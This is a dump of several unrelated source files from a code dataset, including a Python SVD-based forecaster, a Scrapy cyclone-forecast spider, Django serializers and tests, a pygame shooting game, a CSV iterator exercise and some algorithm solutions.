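    return Y @ X.T @ np.linalg.inv(gram)       # closed-form weight matrix Z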
(coeffs))\n\n print (\"[TP, FP, FN, TN]\")\n cntng_table = self.contingency_table (output, predictions)\n print (cntng_table[0])\n\n print (\"Average pseudoinverse time: \" + str (self.pinv_time/len (input)))\n\n if self.svd:\n print (\"Average SVD time: \" + str (self.svd_time/ len (input)))\n \n \n \n \n #------------------------ SVD --------------------------\n \n def createSingularValuesMatrix (self, U, sigma, VT):\n numCols = len(VT) # number of columns is equal to the number of rows of VT\n numRows = len(U[0]) # number of rows is equal to the number of columns of U\n\n arr = [[0 for col in range (numCols)] for row in range (numRows)]\n \n smaller = numCols\n if numRows < smaller:\n smaller = numRows\n for i in range (smaller):\n arr[i][i] = sigma[i]\n return np.array(arr)\n\n def find_inverse (self, U, sigma, VT):\n # Finding the pseudoinverse using the singular value decomposition\n # The pseudoinverse using an SVD is equal to\n # V * sigma^-1 * UT\n V = np.matrix(VT).transpose().getA()\n UT = np.matrix(U).transpose().getA()\n numCols = len (UT) # number of columns is equal to the number of rows of UT\n numRows = len (V[0]) # number of rows is equal to the number of columns of V\n \n arr = [[0 for col in range (numCols)] for row in range (numRows)]\n \n smaller = numCols\n if numRows < smaller:\n smaller = numRows\n for i in range (smaller):\n if (sigma[i] != 0): # Avoid Divide by zero\n arr[i][i] = 1/sigma[i]\n #arr [i][i] = 1/sigma[i]\n # returns V, sigma^-1, UT\n return (V, arr, UT)\n\n # dimensionality reduction\n # Preconditions: U, sigma, VT to be numpy arrays\n # Postconditions: numpy arrays that are truncated size\n def dimension_reduction (self, U, sigma, VT, truncate=-1):\n U = U.tolist()\n sigma = sigma.tolist()\n VT = VT.tolist()\n \n if truncate == -1:\n ktruncate = 0\n while (ktruncate < len (sigma) and sigma[ktruncate] > 0.01):\n ktruncate+= 1\n else:\n ktruncate = truncate\n \n # U will become an (m by r) size matrix (m rows and r columns)\n # sigma will become an (r by r) size matrix (r rows and r columns)\n # VT will become a (r by n) size matrix (r rows and n columns)\n\n Utruncated = [[U[row][col] for col in range (ktruncate)] for row in range (len(U))]\n\n VTtruncated = [[VT[row][col] for col in range (len (VT[row]))] for row in range (ktruncate)]\n\n \"\"\"\n arr = [[0 for col in range (ktruncate)] for row in range (ktruncate)]\n for i in range (len(ktruncate)):\n arr[i][i] = sigma[i]\n \"\"\"\n return (np.array(Utruncated), np.array(sigma), np.array(VTtruncated))\n \n \n def print_concepts (self, number_of_concepts=1):\n print (self.truncated[1])\n \"\"\"\n rank = len (self.truncated[2]) # The rank is equal to the number of rows in V transpose\n print (\"Rank = \" + str(rank))\n \n num = number_of_concepts\n if (rank < num):\n num = rank\n \n for i in range (num):\n Ucol = np.matrix([row[i] for row in self.truncated[0]]).transpose()\n sigma = self.truncated [1][i]\n VTrow = self.truncated [2][i]\n concept = np.matrix(Ucol) * np.matrix (VTrow)\n concept = np.array(concept) * sigma\n \n print (\"Concept \" + str (i) + \") with sigma = \" + str (sigma))\n print (concept.tolist())\n print (\"\")\n print (\"\")\n \"\"\"\n \n\n\n #---------------------- Error Metrics -----------------------\n def l1_error (self, real, prediction):\n error = 0\n for i in range (len (real)):\n error += abs(real[i] - prediction[i])\n return error\n def l2_error (self, real, prediction):\n error = 0\n for i in range (len (real)):\n error += (real[i] - prediction[i]) ** 2\n return 
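# --- Illustrative aside (standalone sketch): dimension_reduction above keeps only
# the leading singular triplets of Z (those with sigma above the hard-coded 0.01
# cutoff), so predictions run through a low-rank factorization. The same
# truncation in plain NumPy:
import numpy as np

def truncate_svd(Z, tol=0.01):
    U, s, VT = np.linalg.svd(Z, full_matrices=False)
    k = max(int(np.sum(s > tol)), 1)             # rank kept, at least one component
    return U[:, :k], np.diag(s[:k]), VT[:k, :]   # Z ~= U_k @ S_k @ VT_k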
error\n \n def mean (self, list):\n return sum (list) / len (list)\n \n def variance (self, list):\n mean = self.mean (list)\n variance = 0\n for value in list:\n variance += (value - mean) ** 2\n return variance / len(list)\n\n \"\"\"\n Returns a contingency table\n \"\"\"\n def contingency_table (self, real, prediction):\n table = []\n for i in range (0, len (real[0])):\n table.append ([0, 0, 0, 0])\n for b in range (0, len (real)):\n if (real[b][i] == 1):\n if (prediction [b][i] >= self.threshold):\n table[i][0] += 1 # True positive\n else:\n table[i][2] += 1 # False negative\n else:\n if (prediction[b][i] >= self.threshold):\n table[i][1] += 1 # False positive\n else:\n table[i][3] += 1 # True negative\n return table\n\n \"\"\"\n Returns an R^2 term that shows how much the model explains the variance\n \"\"\"\n def coeff_of_determination (self, real, prediction):\n\n #sums_of_columns_real = [ sum(x) for x in zip(*real) ]\n #sums_of_columns_prediction = [ sum(x) for x in zip(*prediction) ]\n #print (prediction)\n \n r_squared = []\n for i in range (0, len (real[0])):\n col_real = [row[i] for row in real]\n col_prediction = [row[i] for row in prediction]\n\n mean = self.mean(col_real)\n #ss_total = self.variance (col_real) * len (col_real)\n \n ss_total = 0\n ss_reg = 0\n for testnum in range (0, len(col_prediction)):\n ss_total += (col_real[testnum] - mean) ** 2\n ss_reg += (col_prediction[testnum] - mean) ** 2\n\n if (ss_total == 0):\n r_squared.append (-1)\n else:\n r_squared.append (ss_reg/ss_total)\n return r_squared\n\n\n\n\n\n","sub_path":"forecaster/models/QLearn.py","file_name":"QLearn.py","file_ext":"py","file_size_in_byte":17379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"409425946","text":"import sys\nsys.stdin = open('input_6603.txt', 'r')\n\ndef comb(n, m):\n global result_list\n if n == m + 1:\n if sorted(order) not in result_list:\n print(' '.join(order))\n result_list.append(sorted(order))\n return\n else:\n for i in range(n, k + 1):\n if not visited[i]:\n visited[i] = True\n order.append(str(data[i - 1]))\n comb(n + 1, m)\n visited[i] = False\n order.pop()\n\nwhile True:\n test_data = list(map(int, input().split()))\n if len(test_data) > 1:\n k, data = test_data[0], test_data[1::]\n visited = [False] * (k + 1)\n result_list, order = [], []\n comb(1, 6)\n print()\n elif len(test_data) == 1:\n break","sub_path":"02_algorithm/baekjoon/problem/1000~9999/6603.로또/6603.py","file_name":"6603.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"293545508","text":"import re\nimport scrapy\nimport urllib.parse as urlparse\nfrom collections import namedtuple\nfrom cyclone.items import ForecastTrackItem, CycloneItem, ForecastItem\nfrom cyclone.models import ForecastModel\n\n\nclass CycloneSpider(scrapy.Spider):\n name = \"cyclone_spider\"\n\n start_urls = [\n 'http://rammb.cira.colostate.edu/products/tc_realtime/index.asp'\n ]\n\n def __init__(self, *args, **kwargs):\n super(CycloneSpider, self).__init__(*args, **kwargs)\n self.pattern = re.compile('(?:\\w*:\\s*)(\\d*)')\n\n def __get_query_parameters(self, response):\n parsed = urlparse.urlparse(response.request.url)\n return urlparse.parse_qs(parsed.query)\n\n def __get_table_headers(self, table):\n return list(map(lambda k: k.replace(' ', '_').lower(), table.xpath('.//tr')[0].xpath('.//td/text()').getall()))\n\n def parse_storm_tables(self, response):\n # extract cyclone 
information\n qp = self.__get_query_parameters(response)\n cyclone = CycloneItem(name=qp.get('storm_identifier')[0])\n yield cyclone\n\n # extract information needed by forecast\n fdefaults = namedtuple('ForecastDefaults',\n 'research_geographical_area cyclone synoptic_time type')(**{\n 'research_geographical_area': cyclone.get('name')[:2],\n 'cyclone': cyclone.get('name'),\n 'synoptic_time': None,\n 'type': None\n })\n for table in response.xpath('//table'):\n\n if table.xpath('.//td[contains(text(), \"Forecast Hour\")]/text()').get():\n # extract forecast information\n forecast = ForecastItem(**fdefaults._asdict())\n forecast['synoptic_time'] = int(self.pattern.search(\n response.xpath('//h4[contains(text(), \"Time of Latest Forecast\")]/text()').get()).groups()[0])\n forecast['type'] = ForecastModel.TYPE_CHOICES[0][1]\n yield forecast\n\n keys = self.__get_table_headers(table)\n for track in table.xpath('.//tr')[1:]:\n # extract track information\n values = track.xpath('.//td/text()').getall()\n yield {'track': ForecastTrackItem(**{k: v for k, v in zip(keys, values)}), 'forecast': forecast}\n\n elif table.xpath('.//td[contains(text(), \"Synoptic Time\")]/text()').get():\n keys = self.__get_table_headers(table)\n for track in table.xpath('.//tr')[1:]:\n # extract track and forecast information\n values = track.xpath('.//td/text()').getall()\n item = {k: v for k, v in zip(keys, values)}\n\n forecast = ForecastItem(**fdefaults._asdict())\n forecast['synoptic_time'] = int(item['synoptic_time'])\n forecast['type'] = ForecastModel.TYPE_CHOICES[1][1]\n yield forecast\n\n del item['synoptic_time']\n yield {'track': ForecastTrackItem(**item), 'forecast': forecast}\n\n def parse(self, response):\n for href in response.css('.basin_storms').xpath('.//ul//li//a/@href').getall():\n # yield scrapy.Request(response.urljoin(href), self.parse_storm_tables)\n yield scrapy.Request(\n 'http://rammb.cira.colostate.edu/products/tc_realtime/storm.asp?storm_identifier=WP012019',\n self.parse_storm_tables)\n","sub_path":"src/cyclone/spiders/cyclone_spider.py","file_name":"cyclone_spider.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"269682628","text":"from rest_framework import serializers\nfrom rest_framework.validators import UniqueTogetherValidator\nfrom .models import Keyword\n\n\nclass KeywordSerializer(serializers.ModelSerializer):\n key_word = serializers.CharField(source='query')\n user = serializers.HiddenField(default=serializers.CreateOnlyDefault(\n serializers.CurrentUserDefault()\n ))\n\n class Meta:\n model = Keyword\n fields = ('key_word', 'id', 'user')\n validators = [\n UniqueTogetherValidator(\n message=\"This key_word already exists\",\n queryset=Keyword.objects.all(),\n fields=('query', 'user')\n )\n ]\n\n\nclass SearchResultsSerializer(serializers.ModelSerializer):\n title = serializers.CharField(source='query')\n urls = serializers.SerializerMethodField()\n\n def get_urls(self, obj):\n return obj.get_youtube_urls()\n\n class Meta:\n model = Keyword\n fields = ('title', 'id', 'urls')\n","sub_path":"searcher/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"592977967","text":"from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer\nfrom urlparse import urlparse, parse_qs\nfrom display import Display\n\nclass HTTPHandler(BaseHTTPRequestHandler):\n\n 
def do_GET(self):\n\n print(\"Just received a GET request\")\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n\n query_components = parse_qs(urlparse(self.path).query)\n \n print(query_components)\n\n if 'anim' in query_components:\n effect = query_components[\"anim\"][0]\n else:\n effect = \"static\"\n\n dis = Display()\n\n if effect == 'time':\n dis.time_message()\n self.wfile.write(\"OK\")\n return\n\n if 'message' in query_components:\n messages = [] \n for message in query_components[\"message\"]:\n messages.append(message)\n self.wfile.write(\"OK\")\n if (effect == 'static'):\n dis.multiple_static_message(messages)\n elif (effect == 'sliding'):\n print ('sliding')\n dis.multiple_sliding_message(messages)\n elif (effect == 'alert'):\n dis.alert_message(messages[0])\n else:\n self.wfile.write(\"ERROR - unknown anim \\'\" + effect + \"\\'\")\n else:\n self.wfile.write(\"ERROR - missing GET parameter \\'message\\'\")\n return\n\n def log_request(self, code=None, size=None):\n print('Request')\n\n def log_message(self, format, *args):\n print('Message')\n\nif __name__ == \"__main__\":\n try:\n server = HTTPServer(('localhost', 8000), HTTPHandler)\n print('Started http server')\n server.serve_forever()\n except KeyboardInterrupt:\n print('SigTerm received, shutting down server')\n server.socket.close()","sub_path":"http_handler.py","file_name":"http_handler.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"414337114","text":"from django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.utils.translation import get_language\n\nfrom babel.core import Locale\nfrom mock import patch\nfrom nose.tools import eq_\nfrom tower import activate\n\nfrom affiliates.shared.tests import TestCase\nfrom affiliates.shared.utils import (absolutify, current_locale, redirect,\n get_object_or_none, ugettext_locale as _locale)\n\n\nclass TestAbsolutify(TestCase):\n fixtures = ['sites']\n\n def setUp(self):\n self.patcher = patch.object(settings, 'SITE_URL', 'http://badge.mo.com')\n self.patcher.start()\n\n def tearDown(self):\n self.patcher.stop()\n\n def test_basic(self):\n url = absolutify('/some/url')\n eq_(url, 'http://badge.mo.com/some/url')\n\n def test_protocol(self):\n url = absolutify('/some/url', protocol='https')\n eq_(url, 'https://badge.mo.com/some/url')\n\n def test_relative_protocol(self):\n \"\"\"If protocol is a blank string, use a protocol-relative URL.\"\"\"\n url = absolutify('/some/url', protocol='')\n eq_(url, '//badge.mo.com/some/url')\n\n def test_cdn(self):\n with patch.object(settings, 'CDN_DOMAIN', None):\n url = absolutify('/some/url', cdn=True)\n eq_(url, 'http://badge.mo.com/some/url')\n\n with patch.object(settings, 'CDN_DOMAIN', 'cdn.badge.mo.com'):\n url = absolutify('/some/url', cdn=True)\n eq_(url, 'http://cdn.badge.mo.com/some/url')\n\n\nclass TestRedirect(TestCase):\n urls = 'affiliates.shared.tests.urls'\n\n def test_basic(self):\n with self.activate('en-US'):\n response = redirect('mock_view')\n eq_(response.status_code, 302)\n eq_(response['Location'], '/en-US/mock_view')\n\n def test_permanent(self):\n with self.activate('en-US'):\n response = redirect('mock_view', permanent=True)\n eq_(response.status_code, 301)\n eq_(response['Location'], '/en-US/mock_view')\n\n\nclass TestCurrentLocale(TestCase):\n def test_basic(self):\n \"\"\"Test that the currently locale is correctly returned.\"\"\"\n 
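# --- Illustrative aside (standalone, Python 2 to match http_handler.py above):
# parse_qs(urlparse(path).query) returns a dict mapping each parameter name to a
# *list* of values, which is why the handler indexes [0] for single values and
# can also loop over repeated "message" parameters:
from urlparse import urlparse, parse_qs

qs = parse_qs(urlparse("/display?anim=sliding&message=hi&message=yo").query)
print(qs)  # {'anim': ['sliding'], 'message': ['hi', 'yo']}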
activate('fr')\n eq_(Locale('fr'), current_locale())\n\n def test_unknown(self):\n \"\"\"\n Test that when the current locale is not supported by Babel, it\n defaults to en-US.\n \"\"\"\n activate('fy')\n eq_(Locale('en', 'US'), current_locale())\n\n\ndef mock_ugettext(message, context=None):\n if (get_language() == 'xxx'):\n return 'translated'\n else:\n return 'untranslated'\n\n\n@patch('affiliates.shared.utils.tower.ugettext', mock_ugettext)\nclass TestUGetTextLocale(TestCase):\n def test_basic(self):\n \"\"\"\n Test that translating a string works and doesn't change the current\n locale.\n \"\"\"\n activate('fr')\n eq_(_locale('message', 'xxx'), 'translated')\n eq_(get_language(), 'fr')\n\n\nclass TestGetObjectOrNone(TestCase):\n def test_get(self):\n user = User.objects.create_user('get_object_or_none_test', 'a@b.com',\n None)\n eq_(get_object_or_none(User, username='get_object_or_none_test'), user)\n\n def test_none(self):\n eq_(get_object_or_none(User, username='does.not.exist'), None)\n","sub_path":"affiliates/shared/tests/test__utils.py","file_name":"test__utils.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"444379655","text":"\"\"\"\nGoal 2: Create a lazy iterator that filter stale record\n- stale record: last_updated < 03/01/2017\n\"\"\"\nimport csv\nimport os\nimport itertools\nfrom collections import namedtuple, defaultdict\nfrom datetime import datetime\n\n\ndef read_file(file_name):\n \"\"\"\n Read csv file, skip the header row\n \"\"\"\n with open(file_name) as f:\n reader = csv.reader(f, delimiter=',', quotechar='\"')\n # Skip the header\n next(reader)\n yield from reader\n\n\ndef read_headers(file_name):\n \"\"\"\n Generate headers list from file\n \"\"\"\n with open(file_name) as f:\n reader = csv.reader(f, delimiter=',', quotechar='\"')\n # Skip the header\n headers = next(reader)\n return headers\n\n\ndef generate_final_heads(*iterables):\n \"\"\"\n Generate unique headers from files\n :param iterables: headers file\n :return: a unique set of headers\n \"\"\"\n return {\n head for head in itertools.chain(*iterables)\n }\n\n\ndef emp_generator():\n Employer = namedtuple(\"Employer\", emp_heads)\n for row in emp_data:\n row = (parse_string(item) for item in row)\n yield Employer(*row)\n\n\ndef pi_generator():\n PersonalInfo = namedtuple(\"PersonalInfo\", personal_info_heads)\n for row in personal_info_data:\n row = (parse_string(data) for data in row)\n yield PersonalInfo(*row)\n\n\ndef up_sta_generator():\n UpdateStatus = namedtuple(\"UpdateStatus\", update_status_heads)\n column_parser = (\n parse_string,\n parse_datetime,\n parse_datetime\n )\n for row in update_status_data:\n row = parse_row(column_parser, row)\n yield UpdateStatus(*row)\n\n\ndef vehicles_generator():\n Vehicles = namedtuple(\"Vehicles\", vehicles_heads)\n column_parser = (\n parse_string,\n parse_string,\n parse_string,\n parse_int\n )\n for row in vehicles_data:\n row = parse_row(column_parser, row)\n yield Vehicles(*row)\n\n\ndef combine_iterator(*iterables):\n Record = namedtuple('Record', set_heads)\n for item in itertools.zip_longest(*iterables, fillvalue=None):\n result = {}\n for data in item:\n result.update(data._asdict())\n yield Record(**result)\n\n\ndef filter_stale_record(iterator):\n return filter(lambda x: x.last_updated > datetime(2017, 3, 1), iterator)\n\n\n# Utils\ndef parse_string(data, *, default=None):\n \"\"\"\n Parse data into string type\n :param data: the data to be 
parsed\n :param default: value if data is None or empty\n :return: converted data\n \"\"\"\n if data:\n return str(data)\n else:\n return default\n\n\ndef parse_datetime(data, *, default=None):\n \"\"\"\n Parse data into Python datetime object\n :param data: The data to be parsed\n :param default: Value if data is None or empty\n :return: Python datetime object or default\n \"\"\"\n if data:\n try:\n return datetime.strptime(data, \"%Y-%m-%dT%H:%M:%SZ\")\n except ValueError:\n return default\n else:\n return default\n\n\ndef parse_int(data, *, default=None):\n \"\"\"\n Parse data into Python integer object\n :param data: Data to be parsed\n :param default: If data is blank or invalid\n :return:\n \"\"\"\n if data:\n try:\n return int(data)\n except (ValueError, TypeError):\n return default\n else:\n return default\n\n\ndef parse_row(column_parser, raw_row):\n \"\"\"\n Parse row into pre-defined data type\n :param column_parser: a tuple that contains parser related to row\n :param raw_row: row data\n :return: process row\n \"\"\"\n return (\n func(field)\n for func, field in zip(column_parser, raw_row)\n )\n\n\ncurrent_dir = os.path.abspath(os.getcwd())\nemp_file = os.path.join(current_dir, 'materials/employment.csv')\nper_info_file = os.path.join(current_dir, 'materials/personal_info.csv')\nupdate_stat_file = os.path.join(current_dir, 'materials/update_status.csv')\nvehicles_file = os.path.join(current_dir, 'materials/vehicles.csv')\n\n# employment.csv\nemp_heads = read_headers(emp_file)\nemp_data = read_file(emp_file)\nemp_iter = emp_generator()\n# personal_info.csv\npersonal_info_heads = read_headers(per_info_file)\npersonal_info_data = read_file(per_info_file)\npersonal_info_iter = pi_generator()\n# update_status.csv\nupdate_status_heads = read_headers(update_stat_file)\nupdate_status_data = read_file(update_stat_file)\nupdate_status_iter = up_sta_generator()\n# vehicles.csv\nvehicles_heads = read_headers(vehicles_file)\nvehicles_data = read_file(vehicles_file)\nvehicles_iter = vehicles_generator()\n\n# Goal 2 start\nset_heads = generate_final_heads(\n emp_heads,\n personal_info_heads,\n update_status_heads,\n vehicles_heads\n)\ncombine = combine_iterator(emp_iter, personal_info_iter, update_status_iter, vehicles_iter)\nfilter_iter = filter_stale_record(combine)\nmakes_count = {\n \"Female\": defaultdict(int),\n \"Male\": defaultdict(int)\n}\nfor item in filter_iter:\n makes_count[item.gender][item.vehicle_make] += 1\n","sub_path":"part-2/4-iteration-tools/project_goal3.py","file_name":"project_goal3.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"627966540","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n this.val = val\n this.left, this.right = None, None\nDefinition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\"\"\"\n#adapted from jiadai c++ Your submission beats 52.83% Submissions! using list as Q\n#Your submission beats 52.83% Submissions! when use collections.deque\n#Your submission beats 37.11% Submissions! slower when use queue.Queue which synchronized\n#tried 3 different types of queue implemenation in python, i would rather use list as queue. 
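# --- Illustrative aside (standalone, with a made-up sample row): parse_row in
# project_goal3.py above pairs one parser per column via zip, so each CSV field
# is coerced independently:
from datetime import datetime

parsers = (str, lambda s: datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ"), int)
row = ["abc-123", "2017-03-05T12:04:13Z", "42"]
parsed = tuple(f(v) for f, v in zip(parsers, row))
print(parsed)  # ('abc-123', datetime.datetime(2017, 3, 5, 12, 4, 13), 42)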
just be aware of other implementations\n\nfrom queue import Queue #using synchronized Queue slower\nfrom collections import deque\nclass Solution:\n # @param {TreeNode} root the root of binary tree\n # @return {ListNode[]} a lists of linked list\n '''\n @param root the root of binary tree\n @return a lists of linked list\n '''\n def binaryTreeToLists(self, root):\n #Write your code here\n result = []\n if root == None:\n return result\n #Q = [root] #first level only see root\n #Q = Queue()\n #Q.put(root)\n Q = deque([root])\n #while not Q.empty():\n while Q:\n qs = len(Q)\n #qs = Q.qsize()\n node = Q.popleft() #Q.pop(0) #for list\n #node = Q.get()\n head = ListNode(node.val) #create head with first node\n p = head #iterator\n if node.left:\n Q.append(node.left)\n #Q.put(node.left)\n if node.right:\n Q.append(node.right)\n #Q.put(node.right)\n for i in range(1, qs): #other nodes at this level\n node = Q.popleft() #Q.pop(0) # for list as Q\n #node = Q.get()\n p.next = ListNode(node.val)\n p = p.next;\n if node.left:\n Q.append(node.left)\n #Q.put(node.left)\n if node.right:\n Q.append(node.right)\n #Q.put(node.right)\n result.append(head)\n return result\n","sub_path":"convert_binary_tree_to_link/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"21017","text":"import pygame\nimport math\nfrom random import randint\ndef pythagoras(x1,y1,x2,y2):\n return math.dist((x1,y1),(x2,y2))\n\npygame.init()\n\npygame.mixer.music.load(r\"E:\\dev\\python_workspace\\sounds\\backsound.mp3\")\npygame.mixer.music.set_volume(0.5) # 1~0.1\npygame.mixer.music.play(1)\n\nfsound = pygame.mixer.Sound(r\"E:\\dev\\python_workspace\\sounds\\fire.wav\")\nfsound.set_volume(0.5) # 1~0.1\nssound = pygame.mixer.Sound(r\"E:\\dev\\python_workspace\\sounds\\scream.wav\")\nssound.set_volume(0.5) # 1~0.1\nrsound = pygame.mixer.Sound(r\"E:\\dev\\python_workspace\\sounds\\reload.wav\")\nrsound.set_volume(0.5) # 1~0.1\n\nscreen_width = 1280\nscreen_height = 720\n\nscreen = pygame.display.set_mode((screen_width,screen_height))\n\npygame.display.set_caption(\"hunt\")\nbg1 = pygame.image.load(r'E:\\dev\\python_workspace\\img\\bg.jpg')\nbg2 = pygame.image.load(r'E:\\dev\\python_workspace\\img\\bg.jpg')\nbg1x = 0\nbg2x = 1404\nrw = 75\nrh = 96\nrx = 500\nry = 200\ngox = randint(-1,1)*2\ngoy = randint(-1,1)*2\nrabbit1img = pygame.image.load(r'E:\\dev\\python_workspace\\img\\rabbit1.png')\nrabbit2img = pygame.image.load(r'E:\\dev\\python_workspace\\img\\rabbit2.png')\nrabbit1 = pygame.transform.scale(rabbit1img,(rw,rh))\nrabbit2 = pygame.transform.scale(rabbit2img,(rw,rh))\n\nsnipe = pygame.image.load(r'E:\\dev\\python_workspace\\img\\snipe2.png')\nsnipe = pygame.transform.scale(snipe,(74,74))\nsnix = 300\nsniy = 300\n\nholeL = []\nholeimg = pygame.image.load(r'E:\\dev\\python_workspace\\img\\hole.png')\nholeimg = pygame.transform.scale(holeimg,(16,16))\nholex = 2000\nholey = 2000\n# rsize = 100\nrebound = 0 # recoil variable\n\npygame.font.init()\nmyFont = pygame.font.SysFont(\"Comic Sans MS\",30)\nscore = 0\n\nclock = pygame.time.Clock()\ncnt = 0\nisRunning = True\nwhile isRunning:\n cnt += 2\n bg1x -= 4\n bg2x -= 4\n rw = int(75*(1+ry/400))\n rh = int(96*(1+ry/400))\n if bg1x <= -1404:\n bg1x = 1404\n if bg2x <= -1404:\n bg2x = 1404\n fps = clock.tick(60)\n #print(\"fps :\",clock.get_fps())\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n isRunning = False\n # if event.type == pygame.KEYUP:\n 
# if event.key == pygame.K_LEFT:\n # rx -=5\n # elif event.key == pygame.K_UP:\n # ry -=5\n # elif event.key == pygame.K_RIGHT:\n # rx +=5\n # elif event.key == pygame.K_DOWN:\n # ry +=5\n if event.type == pygame.MOUSEBUTTONUP:\n if rebound == 0:\n rebound = 50\n holex,holey = pygame.mouse.get_pos()\n fsound.play()\n if pythagoras(rx+rw/2,ry+rh*3/5,holex,holey) < (rw+rh)/5:\n holeL.append([rx+(rw+rh)/5-holex,ry+(rw+rh)/5-holey,100])\n score += 10\n ssound.play()\n rx = randint(0,1200)\n ry = randint(0,700)\n snix,sniy = pygame.mouse.get_pos()\n if rebound == 30:\n rsound.play()\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n rx -=5\n cnt -= 1\n if keys[pygame.K_UP]:\n ry -=5\n cnt += 1\n # rsize -= 1\n # rabbit1 = pygame.transform.scale(rabbit1img,(rw*rsize//100,rh*rsize//100))\n # rabbit2 = pygame.transform.scale(rabbit1img,(rw*rsize//100,rh*rsize//100))\n \n if keys[pygame.K_RIGHT]:\n rx +=5\n cnt += 2\n if keys[pygame.K_DOWN]:\n ry +=5\n cnt += 1\n # rsize += 1\n # rabbit1 = pygame.transform.scale(rabbit1img,(rw*rsize//100,rh*rsize//100))\n # rabbit2 = pygame.transform.scale(rabbit1img,(rw*rsize//100,rh*rsize//100))\n\n if keys[pygame.K_1]:\n pygame.mixer.music.play()\n if keys[pygame.K_2]:\n pygame.mixer.music.stop()\n\n # gox += randint(-1,1)\n # goy += randint(-1,1)\n # rx += gox\n # ry += goy\n # for hole in holeL:\n # hole[0] += gox\n # hole[1] += goy\n \n if rx <= 0:\n rx = 0\n gox = randint(-1,1)*2\n if ry <= 0:\n ry = 0\n goy = randint(-1,1)*2\n if rx >= screen_width - rw:\n rx = screen_width - rw\n gox = randint(-1,1)*2\n if ry >= screen_height - rh:\n ry = screen_height - rh\n goy = randint(-1,1)*2\n screen.blit(bg1,(bg1x,0))\n screen.blit(bg2,(bg2x,0))\n if cnt%20<10:\n rabbit1 = pygame.transform.scale(rabbit1img,(rw,rh))\n screen.blit(rabbit1,(rx,ry))\n else:\n rabbit2 = pygame.transform.scale(rabbit2img,(rw,rh))\n screen.blit(rabbit2,(rx,ry))\n for hole in holeL:\n screen.blit(holeimg,(rx+(rw+rh)/5-hole[0]-8,ry+(rw+rh)/5-hole[1]-8))\n hole[2] -= 1\n if hole[2] == 0:\n holeL.remove(hole)\n if rebound > 0:\n rebound -= 2\n screen.blit(snipe,(snix-37,sniy-37-rebound))\n #antialias <== False\n #effect that smooths out the lines and edges in the image\n txt = myFont.render(\"SCORE : \" + str(score), False, (255,0,0))\n screen.blit(txt, (550,50))\n pygame.display.update()\n\npygame.quit()","sub_path":"W5D5/game1.py","file_name":"game1.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"158313443","text":"import os\nimport shutil\nimport pytest\nfrom contextlib import suppress\nfrom selenium import webdriver\n\nBASEDIR = os.path.dirname(__file__)\n\n\n@pytest.fixture(scope='module')\ndef browser(request):\n firefox = webdriver.Firefox()\n def fin():\n firefox.quit()\n request.addfinalizer(fin)\n return firefox\n\n\n@pytest.fixture\ndef path_to_directory_with_pictures():\n return os.path.join(BASEDIR, 'fixtures', '2015-03 Testdir')\n\n\n@pytest.fixture\ndef path_to_webapp_media_directory():\n return os.path.abspath(os.path.join(BASEDIR, '..', 'app', 'static', \n 'media'))\n\n \n\ndef test_upload_pictures_to_server(browser, host, \n path_to_directory_with_pictures,\n path_to_webapp_media_directory):\n\n # The user opens a browser and navigates to the webapp and a login form is\n # shown\n browser.get(url=\"http://{}/\".format(host))\n assert \"mediashare\" in browser.title.lower()\n \n # The user enters correct password\n print(\"Enter correct username and password\") \n\n # A user copies a directory 
with pictures to the server with a file manager\n basename = os.path.basename(path_to_directory_with_pictures)\n parent_dir = os.path.dirname(path_to_directory_with_pictures)\n target_dir = os.path.join(path_to_webapp_media_directory, \n basename + 'åÅ äÄ öÖ')\n os.chdir(parent_dir)\n if os.path.isdir(target_dir):\n shutil.rmtree(target_dir)\n shutil.copytree(basename, target_dir)\n \n # The user refreshes the page and the just uploaded directory is shown\n browser.refresh()\n directory_elements = browser.find_elements_by_id('directory')\n assert any([basename in li.text for li in directory_elements])\n \n # The user clicks on the directory and the app shows a list of pictures\n browser.find_element_by_link_text(directory_elements[0].text).click()\n picture_elements = browser.find_elements_by_tag_name('img')\n assert len(picture_elements) > 0\n \n # Cleanup\n shutil.rmtree(target_dir)\n os.chdir(BASEDIR)\n","sub_path":"tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"214594125","text":"class Solution(object):\n def twoSum(self, numbers, target):\n \"\"\"\n :type numbers: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n l, r = 0, len(numbers) - 1\n while l < r:\n if numbers[l] + numbers[r] == target:\n return l + 1, r + 1\n elif numbers[l] + numbers[r] < target:\n l += 1\n else:\n r -= 1\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.twoSum([1,2,3,4], 7))","sub_path":"167 Two Sum II - Input array is 